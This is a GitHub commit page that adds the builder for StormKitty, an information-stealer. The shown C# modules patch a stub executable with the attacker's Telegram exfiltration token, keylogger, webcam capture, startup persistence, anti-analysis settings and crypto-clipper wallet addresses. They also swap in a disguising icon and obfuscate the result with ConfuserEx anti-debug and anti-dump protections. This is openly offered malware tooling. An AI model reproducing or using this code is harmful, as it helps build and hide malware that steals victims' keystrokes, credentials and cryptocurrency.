Add files via upload

swagkarna · Jan 31, 2025 · 1c80546 · 1c80546
1 parent 07b7dbe
commit 1c80546
Show file tree

Hide file tree

Showing 52 changed files with 22,221 additions and 0 deletions.
diff --git a/StormKitty-2025-builder/StormKittyBuilder.sln b/StormKitty-2025-builder/StormKittyBuilder.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.13.35716.79 d17.13
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StormKittyBuilder", "StormKittyBuilder\StormKittyBuilder.csproj", "{98075331-1F86-48C8-AE29-29DA39A8F98B}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Debug|x64 = Debug|x64
+		Release|Any CPU = Release|Any CPU
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Debug|x64.ActiveCfg = Debug|x64
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Debug|x64.Build.0 = Debug|x64
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Release|Any CPU.Build.0 = Release|Any CPU
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Release|x64.ActiveCfg = Release|x64
+		{98075331-1F86-48C8-AE29-29DA39A8F98B}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {8190B6BE-30AA-4602-9817-C138AE3B6651}
+	EndGlobalSection
+EndGlobal
diff --git a/StormKitty-2025-builder/StormKittyBuilder/App.config b/StormKitty-2025-builder/StormKittyBuilder/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>
diff --git a/StormKitty-2025-builder/StormKittyBuilder/Modules/build/build.cs b/StormKitty-2025-builder/StormKittyBuilder/Modules/build/build.cs
@@ -0,0 +1,109 @@
+/* 
+    Author : LimerBoy
+    Github : github.com/LimerBoy/StormKitty
+*/
+
+using Mono.Cecil;
+using Mono.Cecil.Cil;
+
+using System;
+using System.Linq;
+using System.Collections.Generic;
+
+namespace StormKittyBuilder
+{
+    internal sealed class build
+    {
+        private static Random random = new Random();
+
+        private static string RandomString(int length)
+        {
+            const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+            return new string(Enumerable.Repeat(chars, length)
+              .Select(s => s[random.Next(s.Length)]).ToArray());
+        }
+
+        public static Dictionary<string, string> ConfigValues = new Dictionary<string, string>
+        {
+            { "Telegram API", "" },
+            { "Telegram ID", "" },
+
+            { "AntiAnalysis", "" },
+            { "Startup", "" },
+            { "StartDelay", "" },
+
+            { "ClipperBTC", "" },
+            { "ClipperETH", "" },
+            { "ClipperXMR", "" },
+            { "ClipperXRP", "" },
+            { "ClipperLTC", "" },
+            { "ClipperBCH", "" },
+
+            { "WebcamScreenshot", "" },
+            { "Keylogger", "" },
+            { "Clipper", "" },
+
+            { "Mutex", RandomString(20) },
+        };
+
+
+        // Read stub
+        private static AssemblyDefinition ReadStub()
+        {
+            return AssemblyDefinition.ReadAssembly("stub\\stub.exe");
+        }
+
+        // Write stub
+        private static void WriteStub(AssemblyDefinition definition, string filename)
+        {
+            definition.Write(filename);
+        }
+
+        // Replace values in config
+        private static string ReplaceConfigParams(string value)
+        {
+            foreach (KeyValuePair<string, string> config in ConfigValues)
+                if (value.Equals($"--- {config.Key} ---"))
+                    return config.Value;
+
+            return value;
+        }
+
+        // Проходим по всем классам, строкам и заменяем значения.
+        public static AssemblyDefinition IterValues(AssemblyDefinition definition)
+        {
+            foreach (ModuleDefinition definition2 in definition.Modules)
+                foreach (TypeDefinition definition3 in definition2.Types)
+                    if (definition3.Name.Equals("Config"))
+                        foreach (MethodDefinition definition4 in definition3.Methods)
+                            if (definition4.IsConstructor && definition4.HasBody)
+                            {
+                                IEnumerator<Instruction> enumerator;
+                                enumerator = definition4.Body.Instructions.GetEnumerator();
+                                while (enumerator.MoveNext())
+                                {
+                                    var current = enumerator.Current;
+                                    if (current.OpCode.Code == Code.Ldstr & current.Operand is object)
+                                    {
+                                        string str = current.Operand.ToString();
+                                        if (str.StartsWith("---") && str.EndsWith("---"))
+                                            current.Operand = ReplaceConfigParams(str);
+                                    }
+                                }
+
+                            }
+
+            return definition;
+        }
+
+        // Read stub && compile
+        public static string BuildStub()
+        {
+            var definition = ReadStub();
+            definition = IterValues(definition);
+            WriteStub(definition, "stub\\build.exe");
+            return "stub\\build.exe";
+        }
+
+    }
+}
diff --git a/StormKitty-2025-builder/StormKittyBuilder/Modules/build/icon.cs b/StormKitty-2025-builder/StormKittyBuilder/Modules/build/icon.cs
@@ -0,0 +1,177 @@
+/* 
+    Author : LimerBoy
+    Github : github.com/LimerBoy/StormKitty
+*/
+
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Security;
+using Microsoft.VisualBasic.CompilerServices; // Install-Package Microsoft.VisualBasic
+
+public partial class IconChanger
+{
+    [SuppressUnmanagedCodeSecurity()]
+    private partial class NativeMethods
+    {
+        [DllImport("kernel32")]
+        public static extern IntPtr BeginUpdateResource(string fileName, [MarshalAs(UnmanagedType.Bool)] bool deleteExistingResources);
+
+        [DllImport("kernel32")]
+        public static extern bool UpdateResource(IntPtr hUpdate, IntPtr type, IntPtr name, short language, [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 5)] byte[] data, int dataSize);
+
+        [DllImport("kernel32")]
+        public static extern bool EndUpdateResource(IntPtr hUpdate, [MarshalAs(UnmanagedType.Bool)] bool discard);
+
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    private partial struct ICONDIR
+    {
+        public ushort Reserved;
+        public ushort Type;
+        public ushort Count;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    private partial struct ICONDIRENTRY
+    {
+        public byte Width;
+        public byte Height;
+        public byte ColorCount;
+        public byte Reserved;
+        public ushort Planes;
+        public ushort BitCount;
+        public int BytesInRes;
+        public int ImageOffset;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    private partial struct BITMAPINFOHEADER
+    {
+        public uint Size;
+        public int Width;
+        public int Height;
+        public ushort Planes;
+        public ushort BitCount;
+        public uint Compression;
+        public uint SizeImage;
+        public int XPelsPerMeter;
+        public int YPelsPerMeter;
+        public uint ClrUsed;
+        public uint ClrImportant;
+    }
+
+    [StructLayout(LayoutKind.Sequential, Pack = 2)]
+    private partial struct GRPICONDIRENTRY
+    {
+        public byte Width;
+        public byte Height;
+        public byte ColorCount;
+        public byte Reserved;
+        public ushort Planes;
+        public ushort BitCount;
+        public int BytesInRes;
+        public ushort ID;
+    }
+
+    public static void InjectIcon(string exeFileName, string iconFileName)
+    {
+        InjectIcon(exeFileName, iconFileName, 1, 1);
+    }
+
+    public static void InjectIcon(string exeFileName, string iconFileName, uint iconGroupID, uint iconBaseID)
+    {
+        const uint RT_ICON = 3U;
+        const uint RT_GROUP_ICON = 14U;
+        var iconFile = IconFile.FromFile(iconFileName);
+        var hUpdate = NativeMethods.BeginUpdateResource(exeFileName, false);
+        var data = iconFile.CreateIconGroupData(iconBaseID);
+        NativeMethods.UpdateResource(hUpdate, new IntPtr(RT_GROUP_ICON), new IntPtr(iconGroupID), 0, data, data.Length);
+        for (int i = 0, loopTo = iconFile.ImageCount - 1; i <= loopTo; i++)
+        {
+            var image = iconFile.get_ImageData(i);
+            NativeMethods.UpdateResource(hUpdate, new IntPtr(RT_ICON), new IntPtr(iconBaseID + i), 0, image, image.Length);
+        }
+
+        NativeMethods.EndUpdateResource(hUpdate, false);
+    }
+
+    private partial class IconFile
+    {
+        private ICONDIR iconDir = new ICONDIR();
+        private ICONDIRENTRY[] iconEntry;
+        private byte[][] iconImage;
+
+        public int ImageCount
+        {
+            get
+            {
+                return iconDir.Count;
+            }
+        }
+
+        public byte[] get_ImageData(int index)
+        {
+            return iconImage[index];
+        }
+
+        private IconFile()
+        {
+        }
+
+        public static IconFile FromFile(string filename)
+        {
+            var instance = new IconFile();
+            var fileBytes = File.ReadAllBytes(filename);
+            var pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned);
+            instance.iconDir = (ICONDIR)Marshal.PtrToStructure(pinnedBytes.AddrOfPinnedObject(), typeof(ICONDIR));
+            instance.iconEntry = new ICONDIRENTRY[instance.iconDir.Count];
+            instance.iconImage = new byte[instance.iconDir.Count][];
+            int offset = Marshal.SizeOf(instance.iconDir);
+            var iconDirEntryType = typeof(ICONDIRENTRY);
+            int size = Marshal.SizeOf(iconDirEntryType);
+            for (int i = 0, loopTo = instance.iconDir.Count - 1; i <= loopTo; i++)
+            {
+                ICONDIRENTRY entry = (ICONDIRENTRY)Marshal.PtrToStructure(new IntPtr(pinnedBytes.AddrOfPinnedObject().ToInt64() + offset), iconDirEntryType);
+                instance.iconEntry[i] = entry;
+                instance.iconImage[i] = new byte[entry.BytesInRes];
+                Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage[i], 0, entry.BytesInRes);
+                offset += size;
+            }
+
+            pinnedBytes.Free();
+            return instance;
+        }
+
+        public byte[] CreateIconGroupData(uint iconBaseID)
+        {
+            int sizeOfIconGroupData = Marshal.SizeOf(typeof(ICONDIR)) + Marshal.SizeOf(typeof(GRPICONDIRENTRY)) * ImageCount;
+            var data = new byte[sizeOfIconGroupData];
+            var pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned);
+            Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject(), false);
+            int offset = Marshal.SizeOf(iconDir);
+            for (int i = 0, loopTo = ImageCount - 1; i <= loopTo; i++)
+            {
+                var grpEntry = new GRPICONDIRENTRY();
+                var bitmapheader = new BITMAPINFOHEADER();
+                var pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned);
+                Marshal.Copy(get_ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject(), Marshal.SizeOf(typeof(BITMAPINFOHEADER)));
+                pinnedBitmapInfoHeader.Free();
+                grpEntry.Width = iconEntry[i].Width;
+                grpEntry.Height = iconEntry[i].Height;
+                grpEntry.ColorCount = iconEntry[i].ColorCount;
+                grpEntry.Reserved = iconEntry[i].Reserved;
+                grpEntry.Planes = bitmapheader.Planes;
+                grpEntry.BitCount = bitmapheader.BitCount;
+                grpEntry.BytesInRes = iconEntry[i].BytesInRes;
+                grpEntry.ID = Conversions.ToUShort(iconBaseID + i);
+                Marshal.StructureToPtr(grpEntry, new IntPtr(pinnedData.AddrOfPinnedObject().ToInt64() + offset), false);
+                offset += Marshal.SizeOf(typeof(GRPICONDIRENTRY));
+            }
+
+            pinnedData.Free();
+            return data;
+        }
+    }
+}
diff --git a/StormKitty-2025-builder/StormKittyBuilder/Modules/build/obfuscation.cs b/StormKitty-2025-builder/StormKittyBuilder/Modules/build/obfuscation.cs
@@ -0,0 +1,62 @@
+/* 
+    Author : LimerBoy
+    Github : github.com/LimerBoy/StormKitty
+*/
+
+using System;
+using System.IO;
+using System.Reflection;
+using System.Diagnostics;
+
+namespace StormKittyBuilder
+{
+    internal sealed class obfuscation
+    {
+        // Current directory
+        private static string Desktop = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
+        private static string WorkingDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
+
+        // Write confuzer settings
+        private static string WriteSettings(string file)
+        {
+            string settings = Path.GetTempFileName() + ".crproj";
+            string contents = $"<project outputDir=\"{WorkingDir}\\build\" baseDir=\"{WorkingDir}\" xmlns=\"http://confuser.codeplex.com\"><packer id=\"compressor\"/><module path=\"{file}\"><rule pattern=\"true\" preset=\"maximum\" inherit=\"false\"><protection id=\"anti ildasm\"/><protection id=\"constants\"/><protection id=\"anti tamper\"/><protection id=\"ctrl flow\"/><protection id=\"anti dump\"/><protection id=\"anti debug\"/><protection id=\"invalid metadata\"/><protection id=\"ref proxy\"/><protection id=\"resources\"/><protection id=\"rename\"/></rule></module></project>";
+            File.WriteAllText(settings, contents);
+            return settings;
+        }
+
+        // Run confuzer
+        private static string Confuzer(string settings)
+        {
+            ProcessStartInfo startInfo = new ProcessStartInfo
+            {
+                FileName = "cmd.exe",
+                Arguments = "/C title Confuzer && color f && obfuscator\\Confuser.CLI.exe -n " + settings + " && timeout /t 7",
+            };
+            Console.ForegroundColor = ConsoleColor.Cyan;
+            cli.ShowInfo("Starting obfuscation...");
+            Process process = Process.Start(startInfo);
+            process.WaitForExit();
+            File.Delete("stub\\build.exe");
+            File.Move("build\\stub\\build.exe", Desktop + "\\build.exe");
+            Directory.Delete("build", true);
+
+            string result = Desktop + "\\build.exe";
+            if (File.Exists(result)) return result;
+            cli.ShowError("Failed to obfuscate stub");
+            return null;
+        }
+
+        // Obfuscate executable
+        public static string Obfuscate(string file)
+        {
+            if (!Directory.Exists("obfuscator"))
+                cli.ShowError("ConfuzeEx directory not found!");
+
+            string settings = WriteSettings(file);
+            string location = Confuzer(settings);
+            return location;
+        }
+
+    }
+}